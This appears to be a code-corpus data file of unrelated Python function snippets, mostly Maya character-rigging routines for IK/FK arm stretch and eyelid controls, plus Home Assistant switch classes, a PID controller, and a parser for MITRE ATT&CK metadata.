wrist_fk_ctrl,\n up_arm_ik_jnt,\n lo_arm_ik_jnt,\n wrist_ik_jnt,\n 
ik_handle,\n pin_attr_name='pinElbow',\n shift_attr_name='shiftElbow'):\n\n # add all my attrs on ctrls\n mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1)\n\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1)\n\n mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')\n wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx')\n max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx')\n\n lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx'))\n wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx'))\n\n # Get parents for ik handle and root of the parm\n arm_root_grp = utils.get_parent(up_arm_ik_jnt)\n\n # Create distance nodes between base, end, and pv ctrl to get the length of side of the triangle\n root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node)\n root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl)\n pv_to_end_dist = utils.create_distance_reader(pv_ctrl, ik_last_node)\n\n # easy stuff first - create fk stretch nodes\n lo_arm_fk_mdl = mc.createNode('multDoubleLinear')\n wrist_fk_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx'))\n mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx'))\n mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2')\n mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2')\n\n utils.connect_abs(lo_arm_fk_mdl+'.output', lo_arm_fk_ctrl+'_ZERO.tx')\n if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl):\n utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx')\n\n # These arethe final fk stretch outputs to connect to joints\n fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output']\n\n # NOW creates node s for thew elbow pin\n lo_arm_pin_mdl = mc.createNode('multDoubleLinear')\n wrist_pin_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_pin_mdl+'.input1', 1)\n mc.setAttr(wrist_pin_mdl+'.input1', 1)\n\n if lo_init_length < 0.0:\n mc.setAttr(lo_arm_pin_mdl+'.input1', -1)\n\n if wrist_init_length < 0.0:\n mc.setAttr(wrist_pin_mdl+'.input1', -1)\n\n mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2')\n mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2')\n\n # These arethe final elbow pin stretch outputs to connect to joints\n pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output']\n\n # create shift nodes\n mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1)\n mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1)\n\n tt = 'linear'\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt)\n\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', 
cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt)\n\n shift_final_output = [ lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength']\n\n # Create ik indivisual stretch nodes\n lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear')\n wrist_ik_scale_mdl = mc.createNode('multDoubleLinear')\n\n mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1')\n mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1')\n mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2')\n mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2')\n\n # This is the final output for scale and shift\n ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output']\n\n # Now create the IK auto stretch nodes\n lo_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n\n mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1)\n\n adl = mc.createNode('addDoubleLinear')\n mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1')\n mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2')\n utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'):\n\n # compensate feed in new chain length for soft ik chain length\n utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto s tretch or pin mode\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1')\n utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2')\n mc.connectAttr(mdl+'.output', pc+'.w0')\n utils.connect_reverse(pc+'.w0', pc+'.w1')\n\n ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output']\n\n # now create all my blends\n\n # first blend btween FK and an empty ik input\n # (this ikl input will take another blend node for blending oall the IK options )\n fk_to_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender')\n mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R')\n mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G')\n\n # now create a blender between pin elbow and the rest of the ik options\n auto_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender')\n mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R')\n mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R')\n mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G')\n\n # now create a blender between pin elbow and the rest of the ik 
options\n pin_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender')\n mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R')\n mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R')\n mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G')\n\n # now connect the shift and scale\n mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R')\n mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G')\n\n # now for the magic! Connect the blend networll to joints\n mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx')\n mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')", "def create(cls, client_object, backing=None):\n vm = client_object.parent.vm\n pylogger.debug(\"Calling create on %s with network_label %s\" % (vm.name,\n backing.name))\n bridge = backing.get_bridge()\n return vm.create_vif(bridge)", "def run(params, rig):\n\n # Make sure matrixNodes plugin is loaded\n if not cmds.pluginInfo('matrixNodes', q=True, l=True):\n cmds.loadPlugin('matrixNodes')\n\n # Gather Task Data\n controls = list()\n controls.append(params['ikRootControl'].name())\n controls.append(params['ikPoleControl'].name())\n controls.append(params['ikGoalControl'].name())\n\n # Create IK Setup\n skeleton = [x.name() for x in params['ikSkeleton']]\n ik_joints = duplicate_joints(skeleton, 'ik')\n ik_chain_offset = group_with_transform(ik_joints[0])\n cmds.parent(ik_chain_offset, rig['rigGroup'])\n ik_handle, pole_crv, ik_buffer = create_ik_setup(controls, ik_joints)\n cmds.parent(pole_crv, rig['rigGroup'])\n\n # Run FK Setup\n fk_buffers = fk_run(params, rig)\n\n # Check if IK FK Switch is checked if so run its Setup\n switch_setup(params, rig, ik_joints)\n if params['fkIkSwitch'] is True:\n switch_setup(params, rig, ik_joints)\n\n visibility_attributes(params, fk_buffers, ik_buffer)\n if params['addIkPoleControlFollow']:\n follow_attribute(params)\n\n for x, y in zip(ik_joints, skeleton):\n cmds.pointConstraint(x, y, mo=False)\n cmds.orientConstraint(x, y, mo=False)\n cmds.scaleConstraint(x, y, mo=False)", "def __init__(self, attck_obj = None, **kwargs):\n\n self.attck_obj = attck_obj\n\n self.id = super(AttckMalware, self)._set_id(kwargs)\n self.created_by_ref = super(AttckMalware, self)._set_attribute(kwargs, 'created_by_ref')\n self.name = super(AttckMalware, self)._set_attribute(kwargs, 'name')\n self.aliases = super(AttckMalware, self)._set_list_items(kwargs, 'x_mitre_aliases')\n self.platforms = super(AttckMalware, self)._set_list_items(kwargs, 'x_mitre_platforms')\n self.labels = super(AttckMalware, self)._set_list_items(kwargs, 'labels')\n self.description = super(AttckMalware, self)._set_attribute(kwargs, 'description')\n self.external_references = super(AttckMalware, self)._set_reference(kwargs)\n self.created = super(AttckMalware, self)._set_attribute(kwargs, 'created')\n self.modified = super(AttckMalware, self)._set_attribute(kwargs, 'modified')\n self.stix = super(AttckMalware, self)._set_attribute(kwargs, 'id')\n self.type = super(AttckMalware, self)._set_attribute(kwargs, 'type')\n self.wiki = super(AttckMalware, self)._set_wiki(kwargs)\n self.contributor = super(AttckMalware, self)._set_list_items(kwargs, 'x_mitre_contributors')\n self.revoked = super(AttckMalware, self)._set_attribute(kwargs, 'revoked')", "def set_key(attr):\n cmds.setKeyframe(attr)", "def set_control(self, control):\n 
self.o.write_register(self.dev_id, CONTROL, control)", "def __init__(\n self,\n avm_wrapper: AvmWrapper,\n device_friendly_name: str,\n network_num: int,\n network_name: str,\n ) -> None:\n self._avm_wrapper = avm_wrapper\n\n self._attributes = {}\n self._attr_entity_category = EntityCategory.CONFIG\n self._network_num = network_num\n\n switch_info = SwitchInfo(\n description=f\"Wi-Fi {network_name}\",\n friendly_name=device_friendly_name,\n icon=\"mdi:wifi\",\n type=SWITCH_TYPE_WIFINETWORK,\n callback_update=self._async_fetch_update,\n callback_switch=self._async_switch_on_off_executor,\n )\n super().__init__(self._avm_wrapper, device_friendly_name, switch_info)", "def _add_switch(self, switchdesc):\n # Check switch definition parameters\n switch_attributes = list(switchdesc.keys())\n if not set(switch_attributes).issubset(self.switch_attributes):\n raise ValueError(\n \"Switch definition: '{0}' defined in '{1}' is not supported. \"\n \"Supported switch parameters are '{2}'.\".format(\n json.dumps(switchdesc, indent=2), self._xmlfile,\n self.switch_attributes))\n for mandatory_parameter in self.switch_attributes[:2]:\n if mandatory_parameter not in switch_attributes:\n raise ValueError(\n \"A '{0}' parameter is required in switch definition: \"\n \"'{1}' defined in '{2}'.\".format(\n mandatory_parameter, json.dumps(switchdesc, indent=2),\n self._xmlfile))\n\n # Check the name of the switch is not already reserved\n switch_name = switchdesc[self.switch_attributes[0]][0]\n if switch_name in self._switches:\n raise ValueError(\n \"The switch name '{0}' defined in '{1}' is \"\n \"already used.\".format(switch_name, self._xmlfile))\n\n # Create the switch control\n switch_paths = {}\n for pathdesc in switchdesc[self.switch_attributes[1]]:\n path_name = pathdesc[self.switch_path[0]][0]\n path_boxes = [box[self.unit_attributes[0]]\n for box in pathdesc[self.switch_path[1]]]\n switch_paths[path_name] = path_boxes\n switch_keys = list(switch_paths.keys())\n control = controls[\"Enum\"](\n choices=tuple(switch_keys),\n switch_name=switch_name,\n desc=(\"Switch between paths '{0}:{1}' defined in pipeline '{2}'\"\n \".\".format(switch_name, \"-\".join(switch_keys), self.id)))\n setattr(self.inputs, switch_name, control)\n self._switches[switch_name] = switch_paths\n control.add_observer(\"value\", self._update_activation)\n control.value = switch_keys[0]", "def buildWrist(wrist_ctrl=None, wrist_jnt=None, fingeramount=5, rot_ax=\"Y\"):\n selection = mc.ls(sl=True)\n\n if not selection and (not wrist_jnt or not wrist_ctrl):\n print \"Please select the wrist joint then the wrist controller\"\n return\n if not wrist_ctrl:\n wrist_ctrl = selection[1]\n if not wrist_jnt:\n wrist_jnt = selection[0]\n\n mc.parentConstraint(wrist_jnt, wrist_ctrl, mo=True)\n\n finger_jnts = mc.listRelatives(wrist_jnt, allDescendents=True)\n numfinger_jnts = len(finger_jnts)/fingeramount\n\n print \"fingeramount: \", fingeramount\n for i in range(fingeramount):\n\n singlefinger_jnts = finger_jnts[(numfinger_jnts * i): numfinger_jnts * (i+1)]\n singlefinger_jnts.reverse()\n singlefinger_jnts.pop()\n attrname = getAttrName(singlefinger_jnts[0])\n mc.addAttr(wrist_ctrl, longName=attrname, attributeType=\"float\", keyable=True)\n\n print \"singlefinger_jnts \", singlefinger_jnts\n\n fk_ctrls = FKChain.buildFKChain(fk_joints=singlefinger_jnts, ctrl_scale=0.5, keyword=\"jnt\", createXtra_grp=True)\n\n print \"FK Controllers: \", fk_ctrls\n\n outergrp = \"\"\n\n for j, fk in enumerate(fk_ctrls):\n ctrlgrp = mc.listRelatives(fk, 
parent=True)[0]\n\n if j == 0:\n temp = mc.listRelatives(ctrlgrp, parent=True)[0]\n outergrp = temp\n mc.connectAttr(\"%s.%s\"%(wrist_ctrl, attrname), \"%s.rotate%s\"%(ctrlgrp, rot_ax))\n\n print \"outer grp\", outergrp\n print \"wrist_ctrl\", wrist_ctrl\n\n mc.parent(outergrp, wrist_ctrl)", "def ikHandleCtx(*args, autoPriorityH: bool=True, createCurve: bool=True, createRootAxis:\n bool=True, exists: bool=True, forceSolverH: bool=True, history: bool=True,\n image1: Union[AnyStr, bool]=\"\", image2: Union[AnyStr, bool]=\"\", image3:\n Union[AnyStr, bool]=\"\", name: AnyStr=\"\", numSpans: int=1, parentCurve:\n bool=True, poWeightH: Union[float, bool]=1, priorityH: Union[int, bool]=1,\n rootOnCurve: bool=True, rootTwistMode: bool=True, simplifyCurve: bool=True,\n snapCurve: bool=True, snapHandleH: bool=True, solverTypeH: Union[AnyStr,\n bool]=\"\", stickyH: Union[AnyStr, bool]=\"off\", twistType: AnyStr=\"linear\",\n weightH: Union[float, bool]=1, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def __init__(self, kind, kappa, xi):\n self.kappa = kappa\n\n self.xi = xi\n\n if kind not in ['ucb', 'ei', 'poi']:\n err = \"The utility function \" \\\n \"{} has not been implemented, \" \\\n \"please choose one of ucb, ei, or poi.\".format(kind)\n raise NotImplementedError(err)\n else:\n self.kind = kind", "def ikHandle(*args, autoPriority: bool=True, connectEffector: bool=True, createCurve: bool=True,\n createRootAxis: bool=True, curve: Union[name, bool]=None, disableHandles:\n bool=True, enableHandles: bool=True, endEffector: Union[AnyStr, bool]=\"\", exists:\n AnyStr=\"\", forceSolver: bool=True, freezeJoints: bool=True, jointList: bool=True,\n name: Union[AnyStr, bool]=\"\", numSpans: int=0, parentCurve: bool=True,\n positionWeight: Union[float, bool]=0.0, priority: Union[int, bool]=0, rootOnCurve:\n bool=True, rootTwistMode: bool=True, setupForRPsolver: bool=True, simplifyCurve:\n bool=True, snapCurve: bool=True, snapHandleFlagToggle: bool=True,\n snapHandleToEffector: bool=True, solver: Union[AnyStr, bool]=\"\", startJoint:\n Union[AnyStr, bool]=\"\", sticky: Union[AnyStr, bool]=\"\", twistType: Union[AnyStr,\n bool]=\"\", weight: Union[float, bool]=0.0, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def __init__(self, goal=0, kP=1, kI=1, kD=1, init_pt=0):\n self._pid_lock = threading.Lock()\n\n self.set_goal(goal)\n self.reset(init_pt)\n self.set_gains({\n PIDController.KP_KEY: kP,\n PIDController.KI_KEY: kI,\n PIDController.KD_KEY: kD\n })", "def build_cntrl(self):\n tk.Label(self.cntrl_frame, text = \"Select\\nUniverse:\").pack(side = tk.LEFT)\n menu = tk.OptionMenu(self.cntrl_frame, self.universe, *self.universe_list, \n command = self.set_universe)\n menu.pack(side = tk.LEFT)\n discover_button = tk.Button(self.cntrl_frame, text = \"Discover\", \n command = self.discover)\n discover_button.pack(side = tk.LEFT)\n self.dev_label = tk.StringVar(self.root)\n self.dev_label.set(\"Devices\")\n self.device_menu = tk.OptionMenu(self.cntrl_frame, self.dev_label, [])\n # self.device_menu[\"menu\"].config(tearoff = 0)\n self.device_menu.pack(side = tk.LEFT)\n self.id_box = tk.Checkbutton(self.cntrl_frame, text = \"Identify\", \n variable = self.id_state, \n command = self.identify)\n self.id_box.pack(side = tk.LEFT)\n self.auto_disc_box = tk.Checkbutton(self.cntrl_frame, \n text = \"Automatic\\nDiscovery\",\n variable = self.auto_disc, \n command = self.discover)\n self.auto_disc_box.pack(side = tk.LEFT)", "def _setbgpic(self, 
item, image):\n self.cv.itemconfig(item, image=image)\n self.cv.tag_lower(item)", "def __init__(self, coordinator, upv, camera, switch_type, ir_on, ir_off):\n self.coordinator = coordinator\n self.upv = upv\n self._camera_id = camera\n self._camera = self.coordinator.data[camera]\n self._name = \"{0} {1} {2}\".format(\n DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"]\n )\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n self._switch_type = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)\n _LOGGER.debug(\n \"UnifiProtectSwitch: IR_ON %s IR_OFF %s\", self._ir_on_cmd, self._ir_off_cmd\n )", "def __init__(\n self,\n avm_wrapper: AvmWrapper,\n device_friendly_name: str,\n switch_info: SwitchInfo,\n ) -> None:\n super().__init__(avm_wrapper, device_friendly_name)\n\n self._description = switch_info[\"description\"]\n self._friendly_name = switch_info[\"friendly_name\"]\n self._icon = switch_info[\"icon\"]\n self._type = switch_info[\"type\"]\n self._update = switch_info[\"callback_update\"]\n self._switch = switch_info[\"callback_switch\"]\n\n self._name = f\"{self._friendly_name} {self._description}\"\n self._unique_id = f\"{self._avm_wrapper.unique_id}-{slugify(self._description)}\"\n\n self._attributes: dict[str, str] = {}\n self._is_available = True", "def setSDK(attrDrv,attrDrvn,valDrv,valDrvn,typeKey = 'linear',infinity=1,sel = None):\n if sel==None:\n sel = pm.ls(sl=1)\n driver = sel[0]\n driven = sel[1]\n for i in range(0,len(attrDrvn)):\n for a in range (0,len(valDrv[i])):\n pm.setDrivenKeyframe(driven,cd = (driver + '.'+attrDrv),at = attrDrvn[i],v = valDrvn[i][a],dv = valDrv[i][a],itt = typeKey,ott = typeKey)\n #pm.setDrivenKeyframe(driven,cd = (driver + '.'+attrDrv),at = attrDrvn[i],v = valDrv[i][-1],dv = valDrv[i][-1],itt = typeKey,ott = typeKey)\n #set infinity\n if infinity==1:\n for i in range(0,len(attrDrvn)):\n #convert attr from short name to long name\n attr = attrDrvn[i]\n if attrDrvn[i]=='tx':attr = 'translateX'\n if attrDrvn[i]=='ty':attr = 'translateY'\n if attrDrvn[i]=='tz':attr = 'translateZ'\n if attrDrvn[i]=='rx':attr = 'rotateX'\n if attrDrvn[i]=='ry':attr = 'rotateY'\n if attrDrvn[i]=='rz':attr = 'rotateZ'\n if attrDrvn[i]=='sx':attr = 'scaleX'\n if attrDrvn[i]=='sy':attr = 'scaleY'\n if attrDrvn[i]=='sz':attr = 'scaleZ'\n if attrDrvn[i]=='v':attr = 'visibility'\n #add infinity key\n pm.selectKey(driven + '_' + attr,add=1,k=1)\n pm.keyTangent (itt= 'spline', ott= 'spline')\n pm.setInfinity(poi='linear',pri='linear')", "def __init__(self):\n\n # Diccionario que contendra todas las fuentes para ir llamandolas una por una en ejecucion\n # o poder seleccionar cual lanzar usando el patron factoria a traves de esta clase\n\n self.controller_objects = {'iptables': IptablesController}", "def test_indicate(self):\n self.objective.Indicate()", "def test_indicate(self):\n self.objective.Indicate()", "def __init__( self, owner, shoulderindex, wristindex, ctrlindex=0 ):\n\t\tself.shoulder = ServoJoint( owner, shoulderindex, ctrlindex ) \n\t\tself.wrist = ServoJoint( owner, wristindex, ctrlindex )", "def ct(self, q0, q1, ctrl=None):\n self.__add_quantum_gate(kind=CONTROLLED_T, qid=[q0,q1], ctrl=ctrl)\n return self", "def __init__(self):\n self.key = None\n self.name = None\n self.menu 
= None\n self.ictype = None\n self.icind1 = None\n self.icind2 = None\n self.iexist = None\n self.icname = None", "def vehicle_controller(self, entity, veh_id, agent, agent_camera, is_ego):\n if is_ego:\n controller_id = f\"HeroAgent_{veh_id}\"\n else:\n controller_id = f\"VehicleAgent_{veh_id}\"\n\n private_act = etree.SubElement(entity, \"PrivateAction\")\n controller_act = etree.SubElement(private_act, \"ControllerAction\")\n controller_assign = etree.SubElement(controller_act, \"AssignControllerAction\")\n controller = etree.SubElement(controller_assign, \"Controller\")\n controller.set(\"name\", controller_id)\n controller_properties_group = etree.SubElement(controller, \"Properties\")\n controller_properties = etree.SubElement(controller_properties_group, \"Property\")\n controller_properties.set(\"name\", \"module\")\n if agent == \"simple_vehicle_control\":\n controller_properties.set(\"value\", agent)\n attach_camera = etree.SubElement(controller_properties_group, \"Property\")\n attach_camera.set(\"name\", \"attach_camera\")\n attach_camera.set(\"value\", agent_camera)\n else:\n controller_properties.set(\"value\", agent)\n\n overrides = etree.SubElement(controller_act, \"OverrideControllerValueAction\")\n override_throttle = etree.SubElement(overrides, \"Throttle\")\n override_throttle.set(\"value\", \"0\")\n override_throttle.set(\"active\", \"false\")\n override_brake = etree.SubElement(overrides, \"Brake\")\n override_brake.set(\"value\", \"0\")\n override_brake.set(\"active\", \"false\")\n override_clutch = etree.SubElement(overrides, \"Clutch\")\n override_clutch.set(\"value\", \"0\")\n override_clutch.set(\"active\", \"false\")\n override_parking_brake = etree.SubElement(overrides, \"ParkingBrake\")\n override_parking_brake.set(\"value\", \"0\")\n override_parking_brake.set(\"active\", \"false\")\n override_steering = etree.SubElement(overrides, \"SteeringWheel\")\n override_steering.set(\"value\", \"0\")\n override_steering.set(\"active\", \"false\")\n override_gear = etree.SubElement(overrides, \"Gear\")\n override_gear.set(\"number\", \"0\")\n override_gear.set(\"active\", \"false\")", "def __setattr__(self, name, attr):\n if self._init_complete and not hasattr(self, name):\n impl = self._get_client_impl()\n setattr(impl, name, attr)\n else:\n super(KeyVaultClient, self).__setattr__(name, attr)", "def __init__(__self__, *,\n kind: str,\n kms_key_name: str):\n pulumi.set(__self__, \"kind\", kind)\n pulumi.set(__self__, \"kms_key_name\", kms_key_name)", "def __init__(self, attck_obj = None, **kwargs):\n\n self.attck_obj = attck_obj\n\n self.id = super(AttckTools, self)._set_id(kwargs)\n self.name = super(AttckTools, self)._set_attribute(kwargs, 'name')\n self.alias = super(AttckTools, self)._set_attribute(kwargs, 'aliases')\n self.description = super(AttckTools, self)._set_attribute(kwargs, 'description')\n self.reference = super(AttckTools, self)._set_reference(kwargs)\n self.created = super(AttckTools, self)._set_attribute(kwargs, 'created')\n self.modified = super(AttckTools, self)._set_attribute(kwargs, 'modified')\n self.stix = super(AttckTools, self)._set_attribute(kwargs, 'id')\n self.type = super(AttckTools, self)._set_attribute(kwargs, 'type')\n self.wiki = super(AttckTools, self)._set_wiki(kwargs)\n self.contributor = super(AttckTools, self)._set_attribute(kwargs, 'contributor')", "def __init__(self, *args):\n moose.HHChannel.__init__(self,*args)\n self.Ek = VKDR\n self.Gbar = GKDR\n self.addField('ion')\n self.setField('ion','K')\n self.Xpower = 1 # This will 
create HHGate instance xGate inside the Na channel\n #self.Ypower = 0 # This will create HHGate instance yGate inside the Na channel\n ## Below gates get created after Xpower or Ypower are set to nonzero values\n ## I don't anymore have to explicitly create these attributes in the class\n #self.xGate = moose.HHGate(self.path + \"/xGate\")\n #self.yGate = moose.HHGate(self.path + \"/yGate\")\n self.xGate.A.xmin = VMIN\n self.xGate.A.xmax = VMAX\n self.xGate.A.xdivs = NDIVS\n self.xGate.B.xmin = VMIN\n self.xGate.B.xmax = VMAX\n self.xGate.B.xdivs = NDIVS\n \n v = VMIN\n\n for i in range(NDIVS+1):\n mtau = calc_KA_mtau(v)\n self.xGate.A[i] = calc_KA_minf(v)/mtau\n self.xGate.B[i] = 1.0/mtau\n v = v + dv", "def __setattr__(self, name, value):\n if name == 'actor_ref' or name.startswith('_'):\n return super(ActorProxy, self).__setattr__(name, value)\n attr_path = self._attr_path + (name,)\n message = {\n 'command': 'pykka_setattr',\n 'attr_path': attr_path,\n 'value': value,\n }\n return self.actor_ref.ask(message)", "def setup_fourCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['L_upperLid1_ctrl', 'L_upperLid2_ctrl', 'L_upperLid3_ctrl', 'L_upperLid4_ctrl']\n lf_dn = ['L_lowerLid1_ctrl', 'L_lowerLid2_ctrl', 'L_lowerLid3_ctrl', 'L_lowerLid4_ctrl']\n rt_up = ['R_upperLid1_ctrl', 'R_upperLid2_ctrl', 'R_upperLid3_ctrl', 'R_upperLid4_ctrl']\n rt_dn = ['R_lowerLid1_ctrl', 'R_lowerLid2_ctrl', 'R_lowerLid3_ctrl', 'R_lowerLid4_ctrl']\n\n # Connect lidRails ramps to lid profile controls\n\n # lf_up =========\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid - inner\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # mid - outer\n lf_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um02_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_um02_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[3] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[3] + '.ty', lf_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n\n # lf_dn =========\n\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n lf_dn02_rvn = cmds.createNode('reverse', n='lf_lid01_dn02_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputX', 